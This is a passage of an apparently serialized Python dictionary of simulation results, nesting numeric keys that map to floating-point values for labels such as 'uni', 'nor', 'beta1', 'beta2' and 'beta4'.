0.9902033388465475, 'beta4': 0.6806705721923305}, 50: {'uni': 0.7426285460991999, 'nor': 0.784823983472302, 'beta1': 0.7328375072176379, 'beta2': 0.8989778928787314, 'beta4': 0.714999119165653}, 30: {'uni': 0.7540507423640944, 'nor': 0.7582186672393878, 'beta1': 0.7339734090546394, 'beta2': 0.8529443603173799, 'beta4': 0.7059507241941045}, 20: {'uni': 0.7201249000817622, 'nor': 0.7617493220181438, 'beta1': 0.7349074815395348, 'beta2': 0.7881594314228356, 'beta4': 0.7196526975796932}, 10: {'uni': 0.7153409619896742, 'nor': 0.7224788626089845, 'beta1': 0.7017555851627001, 'beta2': 0.7359482321541709, 'beta4': 0.685808672984458}}, 500: {1000: {'uni': 0.7380604623841498, 'nor': 2.0074921408234596, 'beta1': 0.7259149617361781, 'beta2': 5.1534725835867174, 'beta4': 0.4016185019025364}, 750: {'uni': 0.7277313960695746, 'nor': 1.6968624841848041, 'beta1': 0.7395120438274015, 'beta2': 4.0638408872213905, 'beta4': 0.4252262089873473}, 500: {'uni': 0.7495634259353762, 'nor': 1.3803020407947926, 'beta1': 0.7247647863955615, 'beta2': 2.95719376036709, 'beta4': 0.48637810148569965}, 400: {'uni': 0.7497722433163603, 'nor': 1.2589603075934335, 'beta1': 0.7439095820905751, 'beta2': 2.474926128760821, 'beta4': 0.49292747162383926}, 300: {'uni': 0.722253811511448, 'nor': 1.1061656778845381, 'beta1': 0.7387074468238296, 'beta2': 2.040531745372352, 'beta4': 0.5439583012238866}, 200: {'uni': 0.7419144634436707, 'nor': 0.9866019092605993, 'beta1': 0.7485409246569181, 'beta2': 1.6217964319106442, 'beta4': 0.5938407647627634}, 150: {'uni': 0.7507584514333536, 'nor': 0.9112256273611522, 'beta1': 0.7583144421101103, 'beta2': 1.4136429869481633, 'beta4': 0.6219493991981659}, 100: {'uni': 0.7483473641741184, 'nor': 0.8696982703928622, 'beta1': 0.7458470511513203, 'beta2': 1.1900733793640232, 'beta4': 0.6404674789644428}, 75: {'uni': 0.7581297777885967, 'nor': 0.8098297138565111, 'beta1': 0.74147568796388, 'beta2': 1.036728255630718, 'beta4': 0.6638886698880033}, 50: {'uni': 0.7277428656725512, 'nor': 0.8328795823416434, 'beta1': 0.7504227439834543, 'beta2': 0.9543372753583443, 'beta4': 0.6832013312974475}, 30: {'uni': 0.7544258542081878, 'nor': 0.768097419973158, 'beta1': 0.7167797119759898, 'beta2': 0.8583509524300639, 'beta4': 0.6852309446092829}, 20: {'uni': 0.7254031250497417, 'nor': 0.7362340759894164, 'beta1': 0.7389112075834917, 'beta2': 0.8164314073450918, 'beta4': 0.7063892945802895}, 10: {'uni': 0.6955262901599432, 'nor': 0.7142489442262036, 'beta1': 0.6994344581806992, 'beta2': 0.750942354002658, 'beta4': 0.7099403799059699}}, 400: {1000: {'uni': 0.7364502180846917, 'nor': 2.284553312869663, 'beta1': 0.7541341170458651, 'beta2': 5.0818747242235025, 'beta4': 0.3900704329365574}, 750: {'uni': 0.7504698065388657, 'nor': 1.938239865343596, 'beta1': 0.7769598575433235, 'beta2': 4.01597780597472, 'beta4': 0.40395786312151927}, 500: {'uni': 0.7508573312104527, 'nor': 1.5072813162623548, 'beta1': 0.7305280496529544, 'beta2': 2.857026217797966, 'beta4': 0.4547828036658211}, 400: {'uni': 0.7611248206328712, 'nor': 1.338550267958856, 'beta1': 0.7466143672126452, 'beta2': 2.5495916012797935, 'beta4': 0.4969149207948216}, 300: {'uni': 0.7424343806561035, 'nor': 1.231111156552096, 'beta1': 0.7344575668422653, 'beta2': 2.0773636667154585, 'beta4': 0.5079339216262199}, 200: {'uni': 0.7392633158240819, 'nor': 1.0377847828667477, 'beta1': 0.7586003850660703, 'beta2': 1.6153253239719372, 'beta4': 0.5722234547809886}, 150: {'uni': 0.7391428468766339, 'nor': 0.9949906865630406, 'beta1': 0.7379552345583523, 'beta2': 1.3631500709552795, 'beta4': 0.619870387049708}, 100: {'uni': 0.7356451707387796, 'nor': 0.9291460091070943, 'beta1': 0.7404914473665879, 'beta2': 1.2174882328266758, 'beta4': 0.6262899546773785}, 75: {'uni': 0.7623057151977248, 'nor': 0.8361834398991281, 'beta1': 0.7501586532707593, 'beta2': 1.0872819013301396, 'beta4': 0.6478743366728121}, 50: {'uni': 0.74349850126654, 'nor': 0.8384065389830003, 'beta1': 0.7220703818527061, 'beta2': 0.9340745921343401, 'beta4': 0.6850260219180698}, 30: {'uni': 0.7149500790277772, 'nor': 0.7885112065199036, 'beta1': 0.7213375663568558, 'beta2': 0.8600427555686836, 'beta4': 0.6912613993017295}, 20: {'uni': 0.7221206453316641, 'nor': 0.7460966134674923, 'beta1': 0.7136641113944505, 'beta2': 0.8041327522868057, 'beta4': 0.7046152214673151}, 10: {'uni': 0.7078401582681484, 'nor': 0.7403186043135705, 'beta1': 0.7050250617326397, 'beta2': 0.7383220943967499, 'beta4': 0.6845552561458373}}, 300: {1000: {'uni': 0.7206526844832443, 'nor': 2.7942842452599153, 'beta1': 0.7527628702986627, 'beta2': 5.919411684201717, 'beta4': 0.3670485782403558}, 750: {'uni': 0.7509904630876584, 'nor': 2.2739045920462093, 'beta1': 0.7349341918106195, 'beta2': 4.652614303744448, 'beta4': 0.38740876912159744}, 500: {'uni': 0.7326172812992321, 'nor': 1.790945500928653, 'beta1': 0.763447968796166, 'beta2': 3.2504723882846553, 'beta4': 0.43389149620567713}, 400: {'uni': 0.7346001289882709, 'nor': 1.6118801882818838, 'beta1': 0.7632362935242065, 'beta2': 2.715944059333255, 'beta4': 0.44766620539659857}, 300: {'uni': 0.7427068448325751, 'nor': 1.4193407381871972, 'beta1': 0.72901308536521, 'beta2': 2.2921763593149125, 'beta4': 0.47478159208735254}, 200: {'uni': 0.7372729090295441, 'nor': 1.159679435034981, 'beta1': 0.7510674151033424, 'beta2': 1.8423392212461573, 'beta4': 0.526324417635601}, 150: {'uni': 0.7335555313519704, 'nor': 1.0189459141945576, 'beta1': 0.7774470798853989, 'beta2': 1.5526247983720354, 'beta4': 0.552793650767243}, 100: {'uni': 0.7525668267368835, 'nor': 0.9300778141862717, 'beta1': 0.7349045453993331, 'beta2': 1.2690620927247336, 'beta4': 0.6069832998899233}, 75: {'uni': 0.7398060192576016, 'nor': 0.8937269970573645, 'beta1': 0.7367240662850367, 'beta2': 1.114837775599423, 'beta4': 0.6227770244286678}, 50: {'uni': 0.7361907104794088, 'nor': 0.8467145891887228, 'beta1': 0.7532248025351025, 'beta2': 1.0076451242544675, 'beta4': 0.6677669182736204}, 30: {'uni': 0.7504149824828716, 'nor': 0.8049349990129249, 'beta1': 0.7188773766156613, 'beta2': 0.8917913915287613, 'beta4': 0.7002165400571294}, 20: {'uni': 0.7314574140964747, 'nor': 0.7817553909991105, 'beta1': 0.7162634938969795, 'beta2': 0.8408597207849396, 'beta4': 0.7160054524790228}, 10: {'uni': 0.7073627129526159, 'nor': 0.7221863363680757, 'beta1': 0.7204609453804969, 'beta2': 0.7558169384121463, 'beta4': 0.6931495140186302}}, 200: {1000: {'uni': 0.7423323084504223, 'nor': 3.9465111422421497, 'beta1': 0.748201229654901, 'beta2': 7.332126221988379, 'beta4': 0.3501525587156131}, 750: {'uni': 0.746653717649964, 'nor': 3.1892224661604938, 'beta1': 0.7624407304753418, 'beta2': 5.59235179871814, 'beta4': 0.34982032353631515}, 500: {'uni': 0.7357674078649882, 'nor': 2.251598080951371, 'beta1': 0.7423612184099468, 'beta2': 4.175521005731495, 'beta4': 0.3839217818127895}, 400: {'uni': 0.7395885933950936, 'nor': 2.0424085994835663, 'beta1': 0.7406447160909883, 'beta2': 3.2932035132001656, 'beta4': 0.40297503998297585}, 300: {'uni': 0.7577043809971838, 'nor': 1.6443666764703977, 'beta1': 0.7421027397774597, 'beta2': 2.669410854117533, 'beta4': 0.4276531839131966}, 200: {'uni': 0.7180965904307356, 'nor': 1.407264604807638, 'beta1': 0.7286293957187439, 'beta2': 2.1069547544377403, 'beta4': 0.4870983132798874}, 150: {'uni': 0.7553350101995575, 'nor': 1.1871616066279893, 'beta1': 0.7462056699655844, 'beta2': 1.723221575954481, 'beta4': 0.5273487385508362}, 100: {'uni': 0.7395542668424886, 'nor': 1.040812175501304, 'beta1': 0.7217865304155312, 'beta2': 1.3998981782184052, 'beta4': 0.5719653577277595}, 75: {'uni': 0.7179822358907298, 'nor': 0.9798839747009375, 'beta1': 0.7359864694464765, 'beta2': 1.2271310762157386, 'beta4': 0.5871809308583475}, 50: {'uni': 0.7375146921181255, 'nor': 0.9002210975474763, 'beta1': 0.7393499748203317, 'beta2': 1.0775344882196805, 'beta4': 0.6290086191247244}, 30: {'uni': 0.7169870394193528, 'nor': 0.8158188517233516, 'beta1': 0.7493460184747783, 'beta2': 0.9221767471669186, 'beta4': 0.6549135945910195}, 20: {'uni': 0.73449559591477, 'nor': 0.7810180014458455, 'beta1': 0.7420682468640403, 'beta2': 0.8780748276924514, 'beta4': 0.6867888053047261}, 10: {'uni': 0.7053108649778468, 'nor': 0.7526353976401546, 'beta1': 0.7177991673630623, 'beta2': 0.7604100266538812, 'beta4': 0.6792646013309229}}, 150: {1000: {'uni': 0.7743933245507701, 'nor': 4.870684976620477, 'beta1': 0.7493300795479252, 'beta2': 8.63035716657048, 'beta4': 0.338204647050127}, 750: {'uni': 0.7428327364622048, 'nor': 3.9085507502293373, 'beta1': 0.7529109429719044, 'beta2': 6.406659776251172, 'beta4': 0.3418060411939941}, 500: {'uni': 0.7331842699568302, 'nor': 2.8283847000054734, 'beta1': 0.7315010738620568, 'beta2': 4.49922268514765, 'beta4': 0.3652693771266238}, 400: {'uni': 0.7477876672889165, 'nor': 2.4408121466719894, 'beta1': 0.7486680909128302, 'beta2': 3.8227114105566447, 'beta4': 0.38605950916210385}, 300: {'uni': 0.7714775991116009, 'nor': 1.978646880908542, 'beta1': 0.7471424904471909, 'beta2': 3.044832497044965, 'beta4': 0.40485929874794896}, 200: {'uni': 0.731052318190657, 'nor': 1.6207811171212545, 'beta1': 0.7474999694752592, 'beta2': 2.2933245948022067, 'beta4': 0.46781899904078245}, 150: {'uni': 0.7500922612488313, 'nor': 1.3781581966330505, 'beta1': 0.7352960756488399, 'beta2': 1.9096599656675697, 'beta4': 0.4735125299169063}, 100: {'uni': 0.7279277122549193, 'nor': 1.1692830569706523, 'beta1': 0.7506006169362144, 'beta2': 1.5128965317553913, 'beta4': 0.5319456707433308}, 75: {'uni': 0.7325339806512801, 'nor': 1.0380383734066543, 'beta1': 0.7493119761616068, 'beta2': 1.343582314436481, 'beta4': 0.5737550750224671}, 50: {'uni': 0.7294430093006015, 'nor': 0.9505171237229544, 'beta1': 0.7510871675286181, 'beta2': 1.1329544178629671, 'beta4': 0.6122179404495601}, 30: {'uni': 0.7290644337093428, 'nor': 0.8806444792243782, 'beta1': 0.7296970766498079, 'beta2': 0.9661908520938478, 'beta4': 0.6575438710614618}, 20: {'uni': 0.7222168674984393, 'nor': 0.8420048253770901, 'beta1': 0.724515988463435, 'beta2': 0.8344804556030407, 'beta4': 0.660218564428112}, 10: {'uni': 0.7244918863210531, 'nor': 0.7443455406912518, 'beta1': 0.7195377603425277, 'beta2': 0.7882387387152024, 'beta4': 0.6599711359961713}}, 100: {1000: {'uni': 0.7553514817299303, 'nor': 7.1262210456290624, 'beta1': 0.7529581062774561, 'beta2': 10.253475634536954, 'beta4': 0.3192243144730889}, 750: {'uni': 0.7791294423924775, 'nor': 5.549089935079821, 'beta1': 0.7456036542941434, 'beta2': 7.819101615055815, 'beta4': 0.3181125557346874}, 500: {'uni': 0.7464390747429561, 'nor': 4.023411042911893, 'beta1': 0.719440888915879, 'beta2': 5.393933864641589, 'beta4': 0.3363492806120328}, 400: {'uni': 0.7436820550413948, 'nor': 3.2416913521011184, 'beta1': 0.7474703825572615, 'beta2': 4.366868426716757, 'beta4': 0.34793866437043924}, 300: {'uni': 0.7509432095906787, 'nor': 2.7020137466001795, 'beta1': 0.7409014752879322, 'beta2': 3.421463063906572, 'beta4': 0.36853309485013414}, 200: {'uni': 0.7530374509678488, 'nor': 1.960926209464229, 'beta1': 0.7241407264763559, 'beta2': 2.5782704085356767, 'beta4': 0.4078004886476791}, 150: {'uni': 0.7303983087222535, 'nor': 1.7191618969045015, 'beta1': 0.7347216143259169, 'beta2': 2.1185263308351763, 'beta4': 0.43491143509457303}, 100: {'uni': 0.7257742244079696, 'nor': 1.3801969840551045, 'beta1': 0.7176852231223901, 'beta2': 1.642329425975999, 'beta4': 0.48139070090467456}, 75: {'uni': 0.7517164534931338, 'nor': 1.1818603840334319, 'beta1': 0.7286890186729597, 'beta2': 1.4443184215810094, 'beta4': 0.5183068449522771}, 50: {'uni': 0.7621688606289894, 'nor': 1.0872999413300521, 'beta1': 0.7489827238342822, 'beta2': 1.1848949847718624, 'beta4': 0.5656741415128054}, 30: {'uni': 0.7298084592363608, 'nor': 0.9332998548420763, 'beta1': 0.7387444178885003, 'beta2': 1.0252251878747998, 'beta4': 0.6210582954782421}, 20: {'uni': 0.7441136225233612, 'nor': 0.8527112995573832, 'beta1': 0.7462672248306345, 'beta2': 0.913108948983176, 'beta4': 0.640746443418552}, 10: {'uni': 0.737481767799042, 'nor': 0.7654531340705115, 'beta1': 0.7209580518994956, 'beta2': 0.7703295902259096, 'beta4': 0.6595379429157052}}, 75: {1000: {'uni': 0.8074067248637035, 'nor': 8.982703727613933, 'beta1': 0.7462766315317871, 'beta2': 11.863615971347793, 'beta4': 0.30969669346453244}, 750: {'uni': 0.7905502080924112, 'nor': 7.0625027723964555, 'beta1': 0.7385904561393585, 'beta2': 8.813594802870487, 'beta4': 0.3083689380574924}, 500: {'uni': 0.7664044582012062, 'nor': 5.092979689603615, 'beta1': 0.734519756167919, 'beta2': 5.915617089146454, 'beta4': 0.32579897334383345}, 400: {'uni': 0.7643419874704518, 'nor': 4.082652680068739, 'beta1': 0.7280388893196177, 'beta2': 4.9326418878616085, 'beta4': 0.3443768536878751}, 300: {'uni': 0.7578970756907041, 'nor': 3.305189980415632, 'beta1': 0.7535727790132047, 'beta2': 3.8986893775132603, 'beta4': 0.3523585783087568}, 200: {'uni': 0.7627668279519347, 'nor': 2.366352321461588, 'beta1': 0.7478063096454467, 'beta2': 2.774930336104137, 'beta4': 0.37895595523501135}, 150: {'uni': 0.7551498483242116, 'nor': 2.0146806648840867, 'beta1': 0.715322504892067, 'beta2': 2.27236351355193, 'beta4': 0.4024298445706972}, 100: {'uni': 0.7394637596741217, 'nor': 1.526892470851258, 'beta1': 0.7534285806985298, 'beta2': 1.7401398926989977, 'beta4': 0.4449932415566237}, 75: {'uni': 0.7489504482916669, 'nor': 1.4189660002627995, 'beta1': 0.7590111719264389, 'beta2': 1.4816546253016176, 'beta4': 0.4799916438012694}, 50: {'uni': 0.7231634928736738, 'nor': 1.1665468171368905, 'beta1': 0.7205514516102951, 'beta2': 1.246946632314395, 'beta4': 0.528271236289555}, 30: {'uni': 0.6919736066483383, 'nor': 0.9752350712342117, 'beta1': 0.7326947145486271, 'beta2': 1.017214779212776, 'beta4': 0.6056915196333973}, 20: {'uni': 0.7321248137346815, 'nor': 0.8847322215404421, 'beta1': 0.7436111945765038, 'beta2': 0.9369344506464795, 'beta4': 0.6038200746587884}, 10: {'uni': 0.6999936271725347, 'nor': 0.8176052890572043, 'beta1': 0.7414589395343638, 'beta2': 0.7860543175475491, 'beta4': 0.6658013359881663}}, 50: {1000: {'uni': 0.9349315291336215, 'nor': 13.43691200121997, 'beta1': 0.7415667280225452, 'beta2': 14.529533357585608, 'beta4': 0.3020722643250528}, 750: {'uni': 0.8664297277263152, 'nor': 10.124177956990547, 'beta1': 0.7325637726044728, 'beta2': 10.705574218801685, 'beta4': 0.312164534002672}, 500: {'uni': 0.8012745715384612, 'nor': 7.101608627678545, 'beta1': 0.7482701388420466, 'beta2': 7.331886152921014, 'beta4': 0.3132485584859663}, 400: {'uni': 0.7993068988068693, 'nor': 5.876195499992661, 'beta1': 0.7360457214123197, 'beta2': 5.958198160314339, 'beta4': 0.3272571358134039}, 300: {'uni': 0.7699389442266666, 'nor': 4.551685320466588, 'beta1': 0.7579543434178201, 'beta2': 4.754383485607729, 'beta4': 0.33214677485760385}, 200: {'uni': 0.7737453062936557, 'nor': 3.2743330060587614, 'beta1': 0.7467458291008919, 'beta2': 3.3223709289687107, 'beta4': 0.35436399242374406}, 150: {'uni': 0.7490417235906979, 'nor': 2.6767446787215903, 'beta1': 0.7422159085910014, 'beta2': 2.644746427650133, 'beta4': 0.3714173165341442}, 100: {'uni': 0.7313624526865553, 'nor': 1.9870868548615173, 'beta1': 0.7285126816888758, 'beta2': 2.001888568131041, 'beta4': 0.3952418926791647}, 75: {'uni': 0.7172671987386803, 'nor': 1.6644805287512636, 'beta1': 0.7378322413195023, 'beta2': 1.7028170741593902, 'beta4': 0.43605827899361954}, 50: {'uni': 0.7253230461458138, 'nor': 1.3592272923869326, 'beta1': 0.7452200834032827, 'beta2': 1.3910336399973648, 'beta4': 0.48237565357444456}, 30: {'uni': 0.70803267861597, 'nor': 1.1549808891273663, 'beta1': 0.7232959969444372, 'beta2': 1.0990097769678915, 'beta4': 0.5413580844578947}, 20: {'uni': 0.7363216314094163, 'nor': 0.9876308421952716, 'beta1': 0.7438260730972865, 'beta2': 0.9306032071823038, 'beta4': 0.5831508780013659}, 10: {'uni': 0.7023687035868975, 'nor': 0.8443556631337041, 'beta1': 0.7158289089041515, 'beta2': 0.8017849117678024, 'beta4': 0.6252855701087432}}, 30: {1000: {'uni': 1.135433662003403, 'nor': 22.975611110150748, 'beta1': 0.7573893837030105, 'beta2': 17.74359800346252, 'beta4': 0.297757902293249}, 750: {'uni': 1.0311045283721894, 'nor': 16.483343618177887, 'beta1': 0.7534113622478869, 'beta2': 13.482644094659875, 'beta4': 0.30160940624087845}, 500: {'uni': 0.9139362430769883, 'nor': 11.705414821489235, 'beta1': 0.7484586324824043, 'beta2': 9.438769937249091, 'beta4': 0.3069397480593394}, 400: {'uni': 0.8855972092427258, 'nor': 9.037255267934396, 'beta1': 0.7733590733817911, 'beta2': 7.576713118210859, 'beta4': 0.3152328706658135}, 300: {'uni': 0.8498607707121014, 'nor': 7.206132571959497, 'beta1': 0.7418514574998677, 'beta2': 5.530582974473799, 'beta4': 0.31689463862324563}, 200: {'uni': 0.7917662970649914, 'nor': 5.077848982496681, 'beta1': 0.7304678805443476, 'beta2': 4.204779606913517, 'beta4': 0.3278334953907271}, 150: {'uni': 0.7910806456951968, 'nor': 4.004868875294406, 'beta1': 0.7261505015937928, 'beta2': 3.2079402231129976, 'beta4': 0.3447490181814188}, 100: {'uni': 0.7696591554811341, 'nor': 2.8972005461946866, 'beta1': 0.7297127847288362, 'beta2': 2.3363724000389023, 'beta4': 0.35895086880667004}, 75: {'uni': 0.7363424176614078, 'nor': 2.369420393366632, 'beta1': 0.7526904627618415, 'beta2': 1.9306149063833873, 'beta4': 0.3874230408263742}, 50: {'uni': 0.7096140875475437, 'nor': 1.792450944189413, 'beta1': 0.7162393369797683, 'beta2': 1.4435381512650722, 'beta4': 0.4180218110706144}, 30: {'uni': 0.6993735822894044, 'nor': 1.381219120953892, 'beta1': 0.7092864199251419, 'beta2': 1.1978302897457505, 'beta4': 0.4927113098977276}, 20: {'uni': 0.6854105477122527, 'nor': 1.1684502381086352, 'beta1': 0.7297155809453436, 'beta2': 0.9860055568654263, 'beta4': 0.5218496571816182}, 10: {'uni': 0.6769793341065574, 'nor': 0.9298827298857523, 'beta1': 0.6991421468165611, 'beta2': 0.8384852567044772, 'beta4': 0.5911355331329511}}, 20: {1000: {'uni': 1.5422767881732407, 'nor': 33.623007842941036, 'beta1': 0.8076770761473828, 'beta2': 21.81645368130898, 'beta4': 0.29400214136669206}, 750: {'uni': 1.3565649257548582, 'nor': 25.500787968320108, 'beta1': 0.7836354489834423, 'beta2': 17.05613211546847, 'beta4': 0.2953552404790611}, 500: {'uni': 1.1554066269622438, 'nor': 17.366509269093996, 'beta1': 0.7653357621752842, 'beta2': 11.45041336876129, 'beta4': 0.3037530374927966}, 400: {'uni': 1.0737530948566782, 'nor': 13.540388043219384, 'beta1': 0.7654090294473117, 'beta2': 9.518851192493647, 'beta4': 0.30367790135580414}, 300: {'uni': 0.9765351746747871, 'nor': 10.717684596621698, 'beta1': 0.7362009325282473, 'beta2': 7.150808242448672, 'beta4': 0.3124982191238184}, 200: {'uni': 0.9002188501928331, 'nor': 7.062770475092731, 'beta1': 0.7397883860335908, 'beta2': 4.777154184591877, 'beta4': 0.3159112478562884}, 150: {'uni': 0.8335790056399025, 'nor': 5.58483897460766, 'beta1': 0.7460132208826435, 'beta2': 3.7165330190336245, 'beta4': 0.31991308480594854}, 100: {'uni': 0.7937288019209847, 'nor': 3.9655772323210314, 'beta1': 0.7411963443373258, 'beta2': 2.7650571950679814, 'beta4': 0.3337932064372245}, 75: {'uni': 0.7633892696634527, 'nor': 3.175438383816786, 'beta1': 0.7017838867635625, 'beta2': 2.1935080303965084, 'beta4': 0.35892212583393873}, 50: {'uni': 0.727388616390112, 'nor': 2.3492749534444273, 'beta1': 0.7307786603085943, 'beta2': 1.6613293154255553, 'beta4': 0.3860365833166761}, 30: {'uni': 0.7221576207335421, 'nor': 1.7443088681216943, 'beta1': 0.7203994812969841, 'beta2': 1.228838728852705, 'beta4': 0.4307713330938513}, 20: {'uni': 0.7041433273507007, 'nor': 1.3875298207339808, 'beta1': 0.7244642373998895, 'beta2': 1.0943181325266345, 'beta4': 0.4811743703599059}, 10: {'uni': 0.7012223644343135, 'nor': 1.0245301878477195, 'beta1': 0.6986917466557336, 'beta2': 0.8714720199283585, 'beta4': 0.5538253794857232}}, 10: {1000: {'uni': 3.3860305779409425, 'nor': 69.12629967805236, 'beta1': 1.3311840432830941, 'beta2': 31.886608192512867, 'beta4': 0.30148004390899985}, 750: {'uni': 2.760308940939271, 'nor': 52.32712111436736, 'beta1': 1.1485351997801594, 'beta2': 23.88091780382947, 'beta4': 0.3007675448851966}, 500: {'uni': 2.1187788625497666, 'nor': 34.12244249918099, 'beta1': 0.9875632983483154, 'beta2': 16.303450154076117, 'beta4': 0.29315714851845276}, 400: {'uni': 1.812743282248588, 'nor': 27.535347493750546, 'beta1': 0.9603589961065766, 'beta2': 12.942852748453202, 'beta4': 0.2995636993008456}, 300: {'uni': 1.5698543440275912, 'nor': 20.31822234635588, 'beta1': 0.868758435808308, 'beta2': 9.943250031735536, 'beta4': 0.2966653980441081}, 200: {'uni': 1.2831488048321131, 'nor': 14.727951422793442, 'beta1': 0.8356737691150327, 'beta2': 6.740556657840313, 'beta4': 0.2943697452228861}, 150: {'uni': 1.1268925713293234, 'nor': 10.597118226400635, 'beta1': 0.8108033084059241, 'beta2': 5.115279274356808, 'beta4': 0.31424178539635517}, 100: {'uni': 0.9635160740767054, 'nor': 7.301349015655083, 'beta1': 0.7560708487156951, 'beta2': 3.648381304348421, 'beta4': 0.3048069455780913}, 75: {'uni': 0.8838515573613532, 'nor': 5.74338502795036, 'beta1': 0.744462441212371, 'beta2': 2.818074827786014, 'beta4': 0.3212073081339402}, 50: {'uni': 0.8291338828064758, 'nor': 3.9533981841058488, 'beta1': 0.7380188306751617, 'beta2': 2.094258280901449, 'beta4': 0.3292230380642782}, 30: {'uni': 0.7644312433974103, 'nor': 2.720441186648777, 'beta1': 0.7113163970445261, 'beta2': 1.5020958427312148, 'beta4': 0.3621051408260878}, 20: {'uni': 0.7031423578740116, 'nor': 2.1168935580804584, 'beta1': 0.7043135043678577, 'beta2': 1.1671964551964154, 'beta4': 0.3941268196263035}, 10: {'uni': 0.6876344879848008, 'nor': 1.3628066525293088, 'beta1': 0.6874249300009232, 'beta2': 0.8861925569465577, 'beta4': 0.46282421765776804}}}, 0.1: {1000: {1000: {'uni': 0.34522862285111255, 'nor': 0.6228395073147752, 'beta1': 0.3491475301557177, 'beta2': 1.8016479493371311, 'beta4': 0.24424001680972462}, 750: {'uni': 0.34067029159943607, 'nor': 0.5499598659017021, 'beta1': 0.3486635011755686, 'beta2': 1.3479403032586368, 'beta4': 0.256937225000032}, 500: {'uni': 0.3464084343284053, 'nor': 0.47208323276435604, 'beta1': 0.3459987511001463, 'beta2': 0.9576128375739897, 'beta4': 0.2758735009645715}, 400: {'uni': 0.3523467281914471, 'nor': 0.4515226651894629, 'beta1': 0.3519476796699666, 'beta2': 0.7978696641078354, 'beta4': 0.2864827600190153}, 300: {'uni': 0.3477454390980137, 'nor': 0.423596083058182, 'beta1': 0.3465963700708253, 'beta2': 0.6876688970007049, 'beta4': 0.2976169379574473}, 200: {'uni': 0.3445409313119668, 'nor': 0.4030581972395861, 'beta1': 0.3492651184466396, 'beta2': 0.5551933075253935, 'beta4': 0.31556439238679485}, 150: {'uni': 0.3498705624747738, 'nor': 0.3918102011857414, 'beta1': 0.3456677542317484, 'beta2': 0.49624702752060124, 'beta4': 0.3242273287196293}, 100: {'uni': 0.3436893083795591, 'nor': 0.37284776795342023, 'beta1': 0.34771284546605924, 'beta2': 0.4466105146595203, 'beta4': 0.32803306387910325}, 75: {'uni': 0.3475867160617753, 'nor': 0.36340645271259714, 'beta1': 0.34938185672749816, 'beta2': 0.4170327188966793, 'beta4': 0.32843949400931977}, 50: {'uni': 0.35055629128861204, 'nor': 0.35940286705773605, 'beta1': 0.34632894455437757, 'beta2': 0.3950444302670791, 'beta4': 0.3380127773421535}, 30: {'uni': 0.34398236878275323, 'nor': 0.3513554868714947, 'beta1': 0.34746531457584257, 'beta2': 0.37326172618762804, 'beta4': 0.3377301023189335}, 20: {'uni': 0.35212346707498915, 'nor': 0.3491050335472612, 'beta1': 0.33698617941167014, 'beta2': 0.36496711101835394, 'beta4': 0.3399147522136969}, 10: {'uni': 0.3455385083140642, 'nor': 0.3550667091655473, 'beta1': 0.3455192835205828, 'beta2': 0.3588059524171947, 'beta4': 0.34715372359343916}}, 750: {1000: {'uni': 0.34909526053327966, 'nor': 0.7000192716607003, 'beta1': 0.3436461639650576, 'beta2': 1.7826637593470094, 'beta4': 0.23043671233693377}, 750: {'uni': 0.3521350266061196, 'nor': 0.6065082789810716, 'beta1': 0.3477266969960249, 'beta2': 1.3463479370664821, 'beta4': 0.24140925534497648}, 500: {'uni': 0.3407122010380868, 'nor': 0.5269610372045576, 'beta1': 0.3460101335915343, 'beta2': 0.9369997288365739, 'beta4': 0.2617272822804359}, 400: {'uni': 0.34515571530717193, 'nor': 0.47877303335524596, 'beta1': 0.34752902436605043, 'beta2': 0.8230256289242237, 'beta4': 0.2700214004987484}, 300: {'uni': 0.3483072253851639, 'nor': 0.44993562666728104, 'beta1': 0.349268527034077, 'beta2': 0.6926501525691608, 'beta4': 0.2853686593826423}, 200: {'uni': 0.3470296256996466, 'nor': 0.4196297568242823, 'beta1': 0.34021112730517444, 'beta2': 0.562300202363076, 'beta4': 0.2998847086772037}, 150: {'uni': 0.3464761692956304, 'nor': 0.4042287728631724, 'beta1': 0.3452130359466471, 'beta2': 0.5089640450206934, 'beta4': 0.3081680855306012}, 100: {'uni': 0.35076633420093445, 'nor': 0.378135460048976, 'beta1': 0.3508849050425952, 'beta2': 0.45863169971558315, 'beta4': 0.31859381410486026}, 75: {'uni': 0.3436998033966782, 'nor': 0.3766331003411186, 'beta1': 0.3470801575318038, 'beta2': 0.4256019265347618, 'beta4': 0.33483905786401014}, 50: {'uni': 0.344343221396323, 'nor': 0.3561890060241063, 'beta1': 0.3445446190015034, 'beta2': 0.3984536383725175, 'beta4': 0.33210741741488403}, 30: {'uni': 0.34480539602579574, 'nor': 0.3574621127262308, 'beta1': 0.3463821171864507, 'beta2': 0.37860713383012484, 'beta4': 0.34241644586079795}, 20: {'uni': 0.3492479116908845, 'nor': 0.3468836182897213, 'beta1': 0.3470397303687519, 'beta2': 0.3771778056363512, 'beta4': 0.34309117628812213}, 10: {'uni': 0.34716489049413923, 'nor': 0.34726854629110016, 'beta1': 0.3419429175321523, 'beta2': 0.35692148413605357, 'beta4': 0.34471917186703666}}, 500: {1000: {'uni': 0.34980366649542444, 'nor': 0.8828084069791858, 'beta1': 0.34530404469333964, 'beta2': 2.0390420881992393, 'beta4': 0.21060713902409867}, 750: {'uni': 0.34562049614934987, 'nor': 0.7441575486111333, 'beta1': 0.3446423604936914, 'beta2': 1.5454359942202134, 'beta4': 0.2246312059363231}, 500: {'uni': 0.3499479954535063, 'nor': 0.6104516800045718, 'beta1': 0.34661641393000875, 'beta2': 1.115591239340158, 'beta4': 0.24370751974629912}, 400: {'uni': 0.34623159080404736, 'nor': 0.5643795655935262, 'beta1': 0.34395608282034135, 'beta2': 0.9504329301967376, 'beta4': 0.250956210503198}, 300: {'uni': 0.3425969194301464, 'nor': 0.5049407623024504, 'beta1': 0.35235321689257676, 'beta2': 0.7939578647402028, 'beta4': 0.2683519210299116}, 200: {'uni': 0.3430607177495854, 'nor': 0.44879745877719035, 'beta1': 0.34501529777041695, 'beta2': 0.6292580338502747, 'beta4': 0.2855608768253181}, 150: {'uni': 0.34587642193397855, 'nor': 0.4204615533940365, 'beta1': 0.34164713670280794, 'beta2': 0.5737249925775849, 'beta4': 0.2971573193037079}, 100: {'uni': 0.34238445175117393, 'nor': 0.39388029037529504, 'beta1': 0.34902341792659347, 'beta2': 0.48221913721243437, 'beta4': 0.31469965931902977}, 75: {'uni': 0.3467116122075039, 'nor': 0.38817290389677783, 'beta1': 0.3517222324649411, 'beta2': 0.4486988314905505, 'beta4': 0.32065899569382833}, 50: {'uni': 0.3448974429488288, 'nor': 0.376999764119375, 'beta1': 0.34970045899172114, 'beta2': 0.4136016266145007, 'beta4': 0.3315402268547066}, 30: {'uni': 0.3450763942702253, 'nor': 0.359582406629779, 'beta1': 0.3475273188847172, 